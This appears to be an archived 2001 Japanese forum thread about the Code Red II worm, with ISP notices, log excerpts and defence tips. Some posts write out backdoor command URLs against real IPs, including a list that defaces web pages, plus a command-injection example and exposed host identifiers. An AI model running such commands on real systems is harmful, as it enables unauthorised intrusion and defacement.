でバックドアは残ったまま、ということらしい。

root.exe と ルートディレクトリにある explorer.exe を消して再起動すれば、
バックドアを消すことができるようだ。パッチを当てない限り再感染はする
けど。

静まったのか？
誰も書き込みしなくなった。

こんなメールが来た。

２００１年８月５日
お客様

　　 　　　　　　　　　　　 　株式会社　エヌ・ティ・ティエムイー
　　 　　　　　　　　　　　　　 　　　ＷＡＫＷＡＫヘルプデスク

　　　　　 セキュリティに関するご連絡

　いつもＷＡＫＷＡＫをご利用頂きまして、誠にありがとうございます。
　本メールはセキュリティに関するご連絡です。必ず御一読頂きます様
お願い致します。
　ARIS Analyzer Service (Attack Registry and Intelligence Service)
という機関より、お客様の端末がCode Red Wormというワームに感染し
ているという連絡がございました。
　このワームはWindows NT IISのセキュリティホールへ危害を加えるワ
ームであるということです。このワームの情報につきましては下記ＵＲ
Ｌをご参照下さい。

　http://aris.securityfocus.com/alerts/codered
　http://www.trendmicro.co.jp/virusinfo/codered_a.htm

　一度、お客様の端末の確認、およびパッチファイルのダウンロード等
をお願い致します。
　詳細につきましては文末に添付致しましたARIS様からのメールをご覧
下さい。なお、大変申し訳ございませんがこの件につきましては、ＷＡ
ＫＷＡＫではご質問等を頂いてもお答え致しかねますのでご了承下さい。
以下がARIS様のホームページになります。

　http://aris.securityfocus.com

　今後ともＷＡＫＷＡＫをよろしくお願い申し上げます。


　　　　　　　　　　　　　　　　　　　　ＷＡＫＷＡＫヘルプデスク
　　　　　　　　　　　　　　　　　　　　　　　 　　 担当：井上
　　　　　　　　　　　　　　　　　　　　　　　 TEL：0120-309-092
　　　　　　　　　　　　　　　　　　　　　　　 FAX：03-5675-7022
　　　　　　　　　　　　　　　　　　　　　　 [email protected]
　 　月〜金 土日祝・年末年始
　お問合せ・申込み 　9:00〜19:00 お休み
　技術サポート 9:00〜21:00 10:00〜17:30

>>467 飽きただけでは？
まだ 10 分に一回のペースでアクセスがあるし。

ARIS Analyzer Service ってなんなんでしょうか？

鎮静化するまでどれぐらいかかるものかねェ。

>>452
アースレッドは部屋ごと殺虫スプレーだぞ。

>>471
どうだろうねぇ。ダイヤルアップマシンで無防備にサーバ立ててる
厨房がいなくならない限りはナカナカ・・・

ちなみに Code Red II の活動期限は2001年9月末らしい。
http://www.securityfocus.com/archive/1/201886
> The propagation mechanism is the most novel aspect of this particular
> worm. Here are the steps performed:
>
> * Check local time. If it is less than the year 2002 and is also less than
> the 10th month, then continue. Otherwise, reboot. This should limit the
> worm to the end of September, 2001 if it lives that long.

活動期限を書き換えた変種くらい余裕で登場しそうだが…。

@NetHomeからのお知らせ

＜通信中以外にも、ケーブルモデムのランプが点滅するという現象について＞

こちらの症状の原因は、【Code　Red　ワーム】というウィルスの影響と関連がある可能性がございます。
しかし、【Code　Red　ワーム】は一般のユーザー様には全く被害がございません。

●　Code　Red　ワーム　対象のマシン
Windows NT 4.0 で IIS 4.0 および Index Server 2.0 がインストールされているマシン
Windows 2000 で IIS 5.0 および Indexing service がインストールされているマシン
Windows XP β版 で IIS 5.0 および Indexing service がインストールされているマシン

●　IIS を実行している以下の製品
Cisco CallManager
Cisco Unity Server
Cisco uOne
Cisco ICS7750
Cisco Building Broadband Service Manager
Cisco 600 シリーズ DSL ルータ

弊社サービスは、サーバー利用、ルーター利用共に禁止とさせて頂いておりますので
弊社サービス利用規約に基づいて、Jcom@Nethomeをご利用のお客様への影響はございません。

尚、既に【Code　Red　ワーム】に感染していると思われたお客様には8月5日に
注意を促すメールを送らせて頂きました。
【Code　Red　ワーム】に感染されているお客様は早急に対処のほどをお願い致します。

他の板の人にも注意した方がいいよな。
初心者ばかりみたいだし。

Web制作
レンタル鯖
WebProg
初級ネット
セキュリティ
通信技術
プロバイダー

>>476
通信技術はこっちよりもレベル高いとおもわれ

初級ネットで
ゾーンアラームがさー　　
ってスレッド立ってます。

すみません。
ARIS Analyzer Service ってなんなのかわかる方いたら教えてください。
なんで、WAKWAKから直接じゃなくて、ここから警告がくるんだろう？？

Code Red II 関係情報リンク
かなり最新情報もまじってます

http://www.incidents.org/diary/diary.php
http://slashdot.jp/article.pl?sid=01/08/05/0441253&mode=nested
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Ffromthread%3D0%26list%3D1%26mid%3D201886%26threads%3D0%26end%3D2001-08-11%26start%3D2001-08-05%26
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Ffromthread%3D0%26list%3D1%26mid%3D201885%26threads%3D0%26end%3D2001-08-11%26start%3D2001-08-05%26
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Fend%3D2001-08-11%26list%3D82%26mid%3D201879%26threads%3D0%26start%3D2001-08-05%26fromthread%3D0%26
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=279
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=178
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=279
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=496
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=386
http://www.geocrawler.com/lists/3/SourceForge/4890/0/6330369/

なんだこの板は、住人がみんな冷たいんだな。
つーか、誰も知らないだけか。

>>481
プロバイダからのメールにURLがあったろ。そこ読めや。

ずっとログを取ってるんだけど、１分に一回はしかけて来るよ。
うざくて仕方ない。
なぜかzaqが多いんだけど。

GET 〜〜 HTTP/1.*

っていうアクセスに対し、

DELETE 〜〜 HTTP/1.0

っていうレスポンスを送信元に返すハニーポット
書いて置いとけばどうだろうと思ったけど、DELETE
メソッドは認証が必要なんだよね・・・

ま、要するにIISインストールしてある人は
これ↓を入れて再起動すればオッケーなんでしょ？
http://www.microsoft.com/japan/technet/security/codealrt.asp

>>485
そうなんだけど、新種のX型はバックドアとIEのトロイが残っちゃうみたい

>>486
それを取り除くには、どうしたらいいの？

/scripts/root.exe?/c+dir+"c:\"
/c/winnt/system32/cmd.exe?/c+dir+"c:\"
藁?

今日はすごい回数くる…

　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 ――￣￣￣￣＼
　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　　　　　　　　　　＼
　　　　　　　　　　　　　　　　　　　 　 　　　　　 　｜　　　　　　人　　　　|
　　　　　　　　　　　　　　　　　　　　　　　　　　 　|　　　//|/|/ 　＼　　 　＼
　　　　　　 　　　　　　　　　　　　　　　　　　　　　　||＼|へ　　ー― ＼　　 　|
　　　　　　　　　　　　　　　　　　　　　　　　　 　 　 　　||￣|-|￣￣|― Ｌ　　|＜パケットがゴミのようだ
＿　　　　　　　　　　　　　　　　　　　　　 　　　　　　　　|￣｜￣￣ 　　　|　/
| |＼＿＿＿＿＿　　　　　　　　　　　　　　 　　　　　　　|　＿＿＿　　　/ /
(●)＿＿　　 　|DΞ)|　　　　　　　　　　　　　 　　　　　　|　 　　　　　/|/
　￣　　＼＼―|DΞ)|_　　　　　　　 　　　　 　　 　　　　　|＿＿＿/ 　|
　　　 　　＼＼_|DΞ)ﾉ）　　　　　＿＿―――――――|｀―_　　　＿|＿_
　　　　（￣| | D|　 |◇ﾉ￣￣￣￣　　　　　　　 ｜　　　　＼　 ￣|_/／　　 ―＿
　　　　 (￣￣ ￣￣) |　　　　　　　　　　　　　　 ＼　　 ／　＼ / ＼＼＿ /　　 ―-
　　　　　 (　￣￣￣)| |　　　　　　　　　　　　　　 　＼／　　 　/　|　＼＼/　　　　　ヽ
　　 　　　(＿￣￣) / |　　　　　　　　　　　　　　　　／　 　　/　　|　　　　＼　　 　　　|
　　　　　　 |_|￣￣//　 　　　　　　　　　　　　　　　＼　 　 / 　 　|　　　　　 |　 　　　　|
　　　　　　　| |＿//　　　　　　　　　　　　　 　　　　　＼　|＿＿　|　　　　　　|　 　　 　　|
　　　　　　　|＿＿/__　　　　　　　　　　　　　　　　　　　＼/ ／ ￣|つ　　　／　　　 |　 　|
　　　　　　　　　　　　￣￣￣￣￣￣￣|￣￣／　　　　 /／　　 　し―￣　　　 　　|　　　|

>>484

場合によっては自分が訴えられる可能性があるのでよしましょう。

そのバックドアやらトロイを使って、自分にパッチとワクチン当てて
リブートしてしまうという、乳酸菌のような善玉ウィルス希望

なんか、同じヤツが一度に何十回も要求出してくるタイプがだんだん増えてきてない？

四万テクに出ましたね。危険度４でいつのまにかVer.３になってる

http://www.symantec.com/region/jp/sarcj/data/c/codered.v3.html

>>491
バックドアだけでも消してあげれば、って思ったんだけど、
そもそも無理だったから…

>>493
増えてるかも。1分間に10回以上同じ所から来たりする。
意味無いじゃんって気もするが

>>493

48発

IP: 211.250.76.163
Node: WEBSER
NetBIOS: IS~WEBSER
Group: SONGGOKMS
MAC: 00010290C057
DNS: WEBSER

状況把握が数日分遅れているかもしれないNEWS

http://www.zdnet.co.jp/news/0108/06/e_worm.html

当然感染者サーチして　****.exe使って設定甘々のガバガバにする
ツールとかも有るんでしょうね、、、、
で、こんどはそっちの覗きが来ると　　　うざー

http://www.interlink.or.jp/notification/backno/2001/trb029.html

>>498
ハニーポット作りがいがあるよ（ｗ

とうとうお前もか、
ntsrv02.onc.ne.jp - - [06/Aug/2001:08:13:05 +0900]
おのれは　やっちゃだめだろう？ はぁ〜

一瞬OCNかとおもたある

p09-dn01simabara.nagasaki.ocn.ne.jp - - [06/Aug/2001:13:27:47 +0900] "GET /defau
lt.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXTTP/1.0" 404 282 "-" "-"

ドッカドッカくるよぅ・・・
回線細いんだからやめてくれ！！

>>495
御意。真似厨房が多発しては困ると思っただけなんで。
＃亀レスすまん。

http://www.zdnet.co.jp/news/bursts/0108/06/symantec.html
http://www.symantec.com/region/jp/sarcj/data/c/codered.v3.html

＞＞５０２
すまん、OCNかとｵﾓﾃ書いた。
でも管理者さんのメールアドレスはocnどめいんだったぞい。
オーエヌシーかぁ。

自宅のケーブルモデムが頻繁に点滅するようになったので心配してたんだけど、
休日明けで会社のサーバのログ見たら驚き。
４日から増え初めて５日、６日は数分おきにきてるよ。
Apacheなんで安心、なんて言ってられなくなってきたような。

IISがどうのとか言う前に
Apacherとしてはイヂメに近いモノがあるな。
IISだけに飛んで欲しかったYO。

ここんところ、アタック急増！＞ Code Red：ここんところ、アタック急増！＞ Code Red：ここんところ、アタック急増！＞ Code Red：ここんところ、アタック急増！＞ Code Red：ここんところ、アタック急増！＞ Code Red：ここんところ、アタック急増！＞ Code Red：ここんところ、アタック急増！＞ Code Red：ここんところ、アタック急増！＞ Code Red：ここんところ、アタック急増！＞ Code Red：ここんところ、アタック急増！＞ Code Red：

試しにやってみた

マジでプロンプト出る・・・・

試しにやってみた
マジでプロンプト出る・・・

そりゃ出るだろうよ

dir ってやってみたら、反応なし

変わったお名前のお客様
DARKMAN
STORMBLADE
HERO
DEVILLEO
SUPERCOMPUTER

スパコンって、あんた…

IP: 211.44.11.76
NetBIOS: GOLDBODY
Node: GOLDBODY
Group: NI
MAC: 00A0C92C7D9E
DNS: IS~GOLDBODY

>>515
飲んでたコーヒー吹き出しちゃったよ

IP: 202.250.238.144
Node: INFOED
NetBIOS:
__MSBROWSE__

Group: 獨協医科大学
MAC: 006094EA5479
DNS: infoed.dokkyomed.ac.jp

「どっきょう」て読むのか・・。
大学のサーバーも侵食されまくってるって事か。
ところで
ttp://202.250.238.144/Room/Room.html
マルチメディア教室(Macintosh)てなんのためにあるの？

このままだとやばいです、ただでさえ、回線細いのに・・・。
定額制なのが、唯一の救いか・・。
おいらのサーバーにコードレッド来まくりです。
OSはFreeBSDです。
8/1　21:41記念すべき初訪問。この日は１件。
8/2 23件の訪問 まだまだ序の口。
8/3 24件の訪問 活動一時休止？
8/4 34件のご訪問 深夜になって、急激に活動再開。
8/5 201件 ついに爆発、深夜サーバー止まる。すぐに復旧させたけど・・。
8/6 145件 １４時までのログ。このままだと、３００件いきそう。
このまま増え続けると、ＸＤＡＹが近づいてきました。
私は、定額制だからいいけど、従量制の人は、このままだと、即死しますね。
ここにIP晒し上げたいけど、倫理上しません。

ひろゆきんところはどうなんだろう。

やばい
すっげーやばい
dir実行できちゃった

Code Redに混じって、UDPポート3897のスキャンがくるようになった。
これって、トロイ起動？なんだろ？

Code Red I/IIの影に隠れて別のが動いてるのかと思ったけど、HTTP probeした
と同じホストから来ているが・・・

61.74.223.145
61.220.68.101
ftp.tvzone.co.kr

あ、同じプロバイダ(INFOWEB)からもきた。どんどん。
やはりワームっぽい。

>>520
通報しときました

>>520

dirってプロンプトでフォルダ内を見る時に使うやつ？
実行出来るとヤバいの？
教えてくれ〜

ＣＧＩサンプルのバッチファイルを利用したセキュリティホール
1999/10/21, The Shadow Penguin Security 代表 UNYUN さんによる指摘
対象バージョン： Version1.20cとそれ以前

例：
http://localhost/cgi-bin/input.bat?|dir
によって dir が実行される。

解説： input.bat で、
echo QUERY_STRING=%QUERY_STRING%
の実行時、まず、
echo QUERY_STRING=|dir
と変更されてから実行されるため、 QUERY_STRING= を出力後 dir が実行される。
同様に任意のコマンドが実行可能。
echo QUERY_STRING="%QUERY_STRING%"
としても、
http://localhost/cgi-bin/input.bat?"|dir"
とすると、
echo QUERY_STRING=""|dir""
となるので、
QUERY_STRING="" を出力後 dir"" が実行される。


対策： Version 1.20d (1999/10/23)

>>523
任意のコマンドが外部から実行できちゃうって事
すげーやばい

洒落ならないんで警告メッセージ含んだゴミコマンド実行だけで止めておいた

>>524
それってAnHTTPDの話だろ
今、関係あるのか？

祭りだ、祭りだ、ワッショイワッショイ

>>524-525
ありがと。
ちなみに、これってNTの事だよね？
アホですまん・・・。

http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

>>529
アクセスできませんが、サイトが逝ってます？
それとも、踏まされた！？(ToT)/

>>530
落ち着け
見れるし普通のページだ

>>529 すげー、システム再インストールか。Code Red II に
レジストリいじられてるならしゃぁないか。
まぁオイラには対岸の火事だけど。

Xの解説っす
ブラクラじゃないっす(汗

宇津氏‥

>>531
さんきゅう。どっか混雑してる酔うで回復待つ。

FreeBSDでつなぎなおしたら見えた。
WindowsのPPPoEのMTU設定がDQNだったと思われ、陳謝。

でも、レジ巣鳥改ざん＝システム再インスト、というのは短絡ではないかなあ。
中身、ちゃんと見て書いたんだろか。SecurityFocusの逆アセでも確認するし
かないけど。

＃漏れの中ではレジ巣鳥＝ただの設定データベース。

ウチが借りてるレンタルサーバのログにも
XXXXXXやらNNNNNNNやらが大量に残ってました。
でもUNIXサーバのはずなんだけどなあ。
UNIXでも感染はしないけど攻撃だけは受けるということ？

Code Red は無差別攻撃です。

Security Focusの記事(480参照)だと、

1) Sets SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon\SFCDisable to 0FFFFFF9Dh
(disables system file protection)
2) Sets SYSTEM\CurrentControlSet\Services
\W3SVC\Parameters\Virtual Roots\Scripts to ,,217
3) Sets SYSTEM\CurrentControlSet\Services
\W3SVC\Parameters\Virtual Roots\msadc to ,,217
4) Sets SYSTEM\CurrentControlSet\Services
\W3SVC\Parameters\Virtual Roots\c to c:\,,217
5) Sets SYSTEM\CurrentControlSet
\Services\W3SVC\Parameters\Virtual Roots\d to d:\,,217

仮にこれと、cmd.exe, explorer.exeだけなら・・・

(2)〜(5)は、IISの管理GUIで直せるし、(1)は他人のマシン見て直せるし、
再インストールいらない気が (^_^;

>>539 それすら出来ない連中が今回の犠牲者だ。

# 犠牲者というかタコな鯖缶というか...

>>538
UNIXの場合は、その様に攻撃ログが多数残されていても
特に対処しなくても（つまり無視する）大丈夫なのですか？
当方、詳しくないもので。

http://202.228.147.131/code_red_receive.html

2分間に57発も打ち込まれましたが、上記のようにすれば
IISにエラーとかのログが残りますか？

無視したくても、このまま増加し続けると、無視できないような・・。

>>540

同意。

んでも、
Win2kではデフォでIIS入っちまうし(Proもだっけ?)、HPの仕上がりを自分のPCで検証
する程度の理由で使ってたり、IISって何？て言ってる人にも感染しちまうんですねえ
・・・

この騒動、収束が見えない気が・・・鬱。

>>541

CodeRed I/IIに関しては問題ないです。
隠れ蓑して別のアタックがあるかもしれないしで、既知のパターンを
除外して残りを監視しとけば、十分では。

>>541
Code Red に関しては、今のところ大丈夫みたいでっせ

>>521

自己フォロー。今度はUDPポートが3897じゃなく4345のが来ている。
何種類もあるみたい。

ちなみに、トロイ→Backdoorの誤り。恥じ。

>>545
>>546
サンクス。安心しました。

http://202.250.238.XXX/scripts/root.exe?/c+dir+"c:\"
怖いね

おーい　これ以上それ書くと子供がそこらに貼り出すぞー
大人ならそゆことするなそ。

(ﾟДﾟ)!!

http://202.250.238.XXX/scripts/root.exe?/c+dir+"c:\"

あー、オイラ黙ってたのに...

http://news.yahoo.co.jp/headlines/sbn/010806/cpt/16430000_zdnet003.html
コードレッド３登場！

これってFormatとかもできるの？

>>554
なぜか CodeRed v3 になってるけど、中身は CodeRedII の解説だよ。

>>554

どうせならダュシュとかTURBOとかZEROにして欲しかった。

言うまでもないが、バックドア突くのも犯罪だ。
やめとけよ。

気付いたときに逆ギレして被害者ヅラして怒りのハケ口として
バックドアに入って来た奴だけを吊し上げるだね？

ネタにまどわされずに参りましょう。

バックドアから侵入して対策パッチを当ててあげるのも
やっぱ犯罪ですかね？ いや、オレはやらないけど。

メールボックス覗いて関係者にメリッサ送ってやんのが親切かと。

串使えよ。

interlinkからメールが2度来た。完全泣きが入ってる。

ＺＯＯＴサービスユーザ様　各 位
いつもインターリンクをご利用ありがとうございます。
　2001.08.02より続いております、関東地区ZOOTサービス速度障害について大変ご迷惑
おかけいたしております。通信速度の低下の一因としまして、『Code Red』に感染した
ＩＩＳサーバより、大量のパケットが放出され，ネットワークトラフィックの混雑を引
き起こしていることがわかりました。『Code Red』の詳細は、次のＵＲＬを参照くだ
さい。
→　http://www.zdnet.co.jp/news/0108/03/e_codered.html

　そこで、ＩＩＳ４、及び５を稼動中のユーザ様は、ご自身のサーバのチェックをお願い
申し上げます。検査ツールは、次のＵＲＬをご参照ください。
→http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20010721/2/

　いづれにしましても、至急セキュリティパッチは必ず当ててくださいますようよろしく
お願い申し上げます。セキュリティパッチは、次のＵＲＬをご参照ください。
→http://www.microsoft.com/TechNet/itsolutions/security/topics/codeptch.asp

　お手数ですが、対象のユーザ様は至急ご確認の上対処の程よろしくお願い申し上げます。

　尚、本件ついてのお問合せで、電話が大変混雑しております。お手数ですが、次のメール
アドレスへご連絡くださいますようご了承願います。
(サポートのﾒｱﾄﾞ)

あ〜貼っちゃったヤツいるのか・・・
これじゃ祭り開催決定だな

>>>563
串って、感染してるIP閉じるために使うの？
基本的に、一回スキャンかけたIPには来ないみたいですよ。
それ以前に、１時間に何十件と来てるのに、ぜんぶチェックしきれないって。

port80閉じたらいいんだけど、そうはいかない・・・

>>561
まずいんじゃないですかね。
人の計算機の不法使用ということになり。

相手に事情が理解され、訴えられなければOKの可能性もなきにしもあらず
ですが、説明できる根拠を整え、相手も説明を聞く耳があると想定するのは、
手間もリスクも大きすぎます。危うきには手を出さず、ですね。

今回ばかりは、プロバイダが主体的に解決に参加しないとどうにもならない
かも（鯖立ててるという意識すらない感染例が相当あると思われ。）

>>567
ニュースで「家庭で使われているＰＣには関係ない」って言ってた。

>>568
MSの定義では、「Windows2000は、家庭用PCのOS」ではないのです。
という以外に根拠のないニュースゆえ。
パッチ当ててないIISが動作してて、80番をルータとかでふさいでない限り一緒。

>>568
嘘言うな。
不正使用には変わらん。

大震災後の水道、ガス、電気の復旧作業と同じかな。
一旦プロバイダの大元でport80を完全に閉じる。
一軒一軒安全を確認してからport80を開く。
駄目だ、気の遠くなるような作業だ（藁

こんな状態のまま照れ穂突入
どうなるんでしょ

http://www.jpcert.or.jp/at/2001/at010019.txt

>>570
ばれなきゃ問題なし。

code redに感染したヴォケのせいで障害が発生してるのであるから、
root.exe叩いて落すのは緊急避難。 (かなり無理あり 笑)

漏れ、ダイアルアップ陣まで感染してる時点で、もう個人個人でどーのこーのっていう話は終わってると思う
いくらニュースで言ってたって自分の事だと思わないぜきっと

>>574
俺もブチ落としてやりたいのは一緒なんだってば。

とりあえずプロバイダに連絡入れまくって、その IP 緊急措置
として切り離せというのが精一杯。
でも CodeRed 騒ぎ自体を知らない管理者がいるプロバイダが
多くてマジで切れそう。

MSは早く、ウィンドウズアップデートの重要な更新でパッチを配ればいいのに。

今日暴れてる code red II は、土日に感染した奴だよね。
週明けの今日に感染して潜伏してるのが明日騒ぎ出すとか
考えると鬱だ。

>>574

とりあえず突っ込んでおくと、
root.exeは単にbackdoorなので、感染を止めるには・・・リ(検閲)−トしないと。
リ(検閲)−ト用に、root.exeは残しておきましよう。

というか、多分、そんなことをしても間に合わないくらい広がっているので、
無駄な抵抗だし、サイト管理者か上流プロバイダにゴラアと文句つけて、
切断するか直すかしてもらうしかないですね。

　Code Red II の目的は裏口を作ることじゃなくて、
使うことなんだよね？　だけど感染したマシンの
情報を、どこかに送る機能は無いみたいだ。とい
うことは、Code Red II が作った裏口に入り込む別
のワームが近々登場するってことだろうか？

　ま、「入り口は俺が作った。後は自由行動とする」
というのもありかもしれないが。

火事の時は他人の家でも窓割って入って良いというのはこの場合
適用されんのか？

無印Code Redのつもりで「パッチあててリブートすればもう安心！」
と思ってるヤツら多そう・・・。

http://210.127.44.165/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://210.75.132.10/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://203.253.161.101/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://203.253.15.156/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://61.136.9.32/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://61.117.53.228/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://202.207.146.50/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://202.98.82.66/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://165.76.123.181/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://165.76.87.36/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm

↑やめれ。

SIIのやつネットから切り離してくれよ。
なんとかならないの？

＃うち回線細んでやばいっす。

>>583
入り口？

>>583 そゆのは半角板の方が効果的と思われ

>>484みたいなことしなくても、リクエストが来たら、
その鯖に自動でGET /scripts/***送ってログインして
moveでリネームとかattribで実行権カットとかやって、
最後にrundll.exe ****みたいなことしてやるハニーポット
作るかなって思ったけど、犯罪になりそうなのでやめとく

どうでもいいけど、昨日J-COMにログ添付メール送ったら
お礼のメールが届いてた。

前例主義の国だし、難しいかと。

たとえば、隣の家の木の葉が舞い込んできて苦情をのべてもどうにも
ならないんで、入って切ったら家宅不法侵入てのもあるし。

緊急性の説明が、相手に伝われば問題にならない「可能性」はある
けど、まず当事者との連絡・確認の努力をしてないと、主張が弱くな
るし、相手が納得しないのだと、やはりトラブルになりまっせ。

こんだけたくさんWormが発生するのに、個々人で当事者との連絡・
確認努力は既に不可能→プロバイダなんとかせい、(切断、フィルタ、
連絡せい)としか言えんのではないかと思います。

>>586 クリックすると相手のサイトが改竄される。君がやらなくても
いずれ google 君や lycos 君が上のリンク拾って改竄される。
2ch って robot.txt 使ってるんだっけ？

>>585
IISでした。すまそ。
鬱出し脳。

>>582
II にしても、root.exe, explorer.exeは仕掛けられ, レジ巣取はいじられだが、
ひとまずリブートのみでワーム自体は居なくなるのではなかったか？

ここはエンコも知らないアホの吹き溜まりです　┐(´ー｀)┌

>>592
ワームは居なくなるけど穴は開いたままなので
遅かれ早かれ再感染

>>580

今日の昼になってから、HTTPアクセスのあとにbackdoor探しのUDPスキャンを
ペアでやってくるお方が多いので、現にそうなってる気が。

観察したポート。1143, 4345, 3897, 1188
とはいえ、ポート番号はいくらでも選べるだろうが、完全ランダムじゃないようだ。
感染者のIPアドレスと相対なのか？

なんにしてもHTTP, SYNではじいて蹴ってしまってて、root.exe等が送り込まれる
前に撃退してるので、ウラが取れないんだけど。

>>594
理解。その点は初代と同様ね。

しかし Code Red が駆逐されたらまた１日数十アクセスに戻ってしまう…。
Code Red ﾏﾝｾｰ

今ごろ遅いぜ、日経BP

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20010806/1/

>>595
バックドア便乗して何か植付けに来るアクセス、今日の昼から時々来てるよ。

一番怖いのが、ルータのエンジンにＩＩＳを使っているのが、管理者も気づかないので、
すごく怖い。

最近のciscoとか特にやばい。

http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20010731/5/

> しかしコンピュータ・ウイルス専門家のRob Rosenberger氏は，
> FBI NIPCが警告を発したことに対し，「FBIはパニックを引き起こそう
> としている」と非難。「Code Redの脅威は深刻に受けとめるべきだが，
> パニックに陥ったユーザーはCode Redと同じくらい危険だ」（同氏）と
> 述べている。

古い記事だけど、FBIは正しかった。しかしこのおっさんもある意味
正しい。パニックに陥ったユーザーというか、F○厨ってやつが・・・

参考ＵＲＬ
http://www.jpcert.or.jp/at/2001/at010014.txt

>>602
これ、ルータのエンジンではなくて、管理装置(たぶんパソコン搭載)のよ〜に見えるん
ですが。（やばいことには変わりないケド）

カンコ君も困ってる
http://www.kornet.net/openboard/nktnews/010806.html
たぶん

うむ、言ってる事はわからんが、とりあえず困ってそうだ

http://www.security.nl/misc/codered-stats/
時間と共に悪化してるな

http://www.security.nl/misc/codered-stats/geodist.gif
東アジア崩壊中（笑）

>>606
ｹﾞﾗｹﾞﾗ　　　・・・って笑い事じゃねー

父さん！丸がでっかいです！

>>606

他国に比べて個人のWin2kユーザが多いせいもあるんだろか？

発信源は確実にこのでかい丸の中のどこかだな

>>606
日本の姿が見えないYO!

>>606
爆心地が日本海あたりなのがなげやりでイイ！

>>606
Java版がまた笑える！

CodeRedII、海からやってきた説。
やっぱり荒波に揉まれて鍛えられてるから強いのかな。
母なる海ってなんでも生むんだね

あぁああ、今日もこんなに来るのか・・・鬱だ。

でもこれって、『ここのカギ掛かってませんよ』って知らせにきてる様なものか？

爆心地はやっぱりあの国ですかねぇ。

アラスカに佇むCodeRed。
オーストラリアのど真ん中に佇むCodeRed。
なんだか風流だね

ゴジラ

絶対外人もこれ見てｹﾞﾗｹﾞﾗ笑ってるよな

つうか、頼むから感染さんといてと隔離されたりして・・・

広島、長崎を思い出します

ぢゃあ、今日がピークで、次は8.15だに。

>>606
アイスランドから南アフリカまで．．．

自動的にログを読んで感染元を調べるワームとか作ったら面白ろそう。

シマンテックさんお願いですからもうウィルスまくの止めてください。
norton買いますから〜

くそ暑い登校日を思いだします
♪あーゆるすーまじ原爆をー

中国さんお願いですからもうウィルスまくの止めてください。
ネギ買いますから〜

>>606
全て、カンコックのせいです。
国連を通じて、賠償請求をしましょう！
マジで！

おまえウザイよ。
くんなよ。

おれ、ＷＩＮ９８なんだから・・・

ガ━━（ﾟдﾟ;）━━ン！ニホンちゃん大ピンチ

激しくﾜﾗﾀ

アメ公が中国に報復攻撃しようとしたら近隣諸国に誤爆してるに一票

これ笑うしかねーよ

円の中心はＫ国かな？

今日が何の日か考えると、この原爆もどきは洒落にならんな

アクセスしてきた鯖に応急処置するハニーポット、本気で作りたいよ

>>606
気に入った。
空く恥部デスクトップに貼り付けるよ（ﾜﾗ

>>633

日本だとおもってたが、Java版で表示される緯度・経度はソウル。

http://www.security.nl/misc/codered-stats/geodist.html

N37.53, E127.0

うわー、立場ね〜　（　´Д｀）

CODEREDより怖いウィルス出現？
http://news.yahoo.co.jp/headlines/reu/010806/int/11082501_japan_47216_1.html

東京、大阪のカウントはそれぞれ1, 2、ソウルが5236だ。
ただ単に、報告してねえだけじゃんか！？

つまり、報告後には、爆弾が2つってこった・・・

>>639
CodeRedIIじゃん

>>639
ていうか、亀ニュースなのでは。「週末にかけて云々・・・」

>>639
Ｘ君の事でしょ、それ。

�dで来たパケット逆引きしてるだけじゃないのかな？
211系と61系が目立つことに意味はありますか？

この不正アクセスには対処法はありますか？ゾヌはちゃんと防いでくれてるのですか？

すいません既出でした・・・逝って来ます

XXXは第一オクテットかぶってるご近所さんを攻めていくようだ
lang見てる所といい 明らかにYellowを徹底的に痛めつけようと
しているね。
んでもって、その目的はほぼ達成されてる　　ｗ

　　　　8月4日深夜から8月6日1時30分までの間、インターネット接続遅延障害が発生しました。
　　　　原因は、インターネットからの「Code Red ワーム」攻撃対応でルータに処理負荷がかかり、
　　　　通常データ処理に遅延が発生したためです。
　　　　依然としてワーム攻撃は続いておりますが、内部設定変更により、これらワームの
　　　　影響を受けないように対策を講じました。
　　　　長時間にわたりご迷惑をお掛けしましたことを、深くお詫び申し上げます

俺が使ってるプロバイダ。昨日は遅すぎて使い物にならんかった。

PC立ち上げて一時間で40件も80番ポートにお客さんが来たよヽ(´ー`)ﾉ

>>644
うちは210系と*.icc.ne.jp、*.dti.ne.jpから来てる。
犯された鯖は自IPの近辺をスキャンするから、まぁ納得。
ちなみにうちはdti。

う〜ん、中国、韓国に次いで、アメリカ辺りが怪しいのかな。
こんなでかい原爆落としたの誰だよ！

>>649
普通だよ

>>647
納得＆感心。
ゴミレスｽﾏｿ

参考。*.jpのIPブロック。
http://www.nic.ad.jp/jp/regist/dns/doc/jp-addr-block.html

実態よりも、観測点に依存するわけかもね。
Ｋ国のは出張パケットが多いか、国内に観測点があるのか。

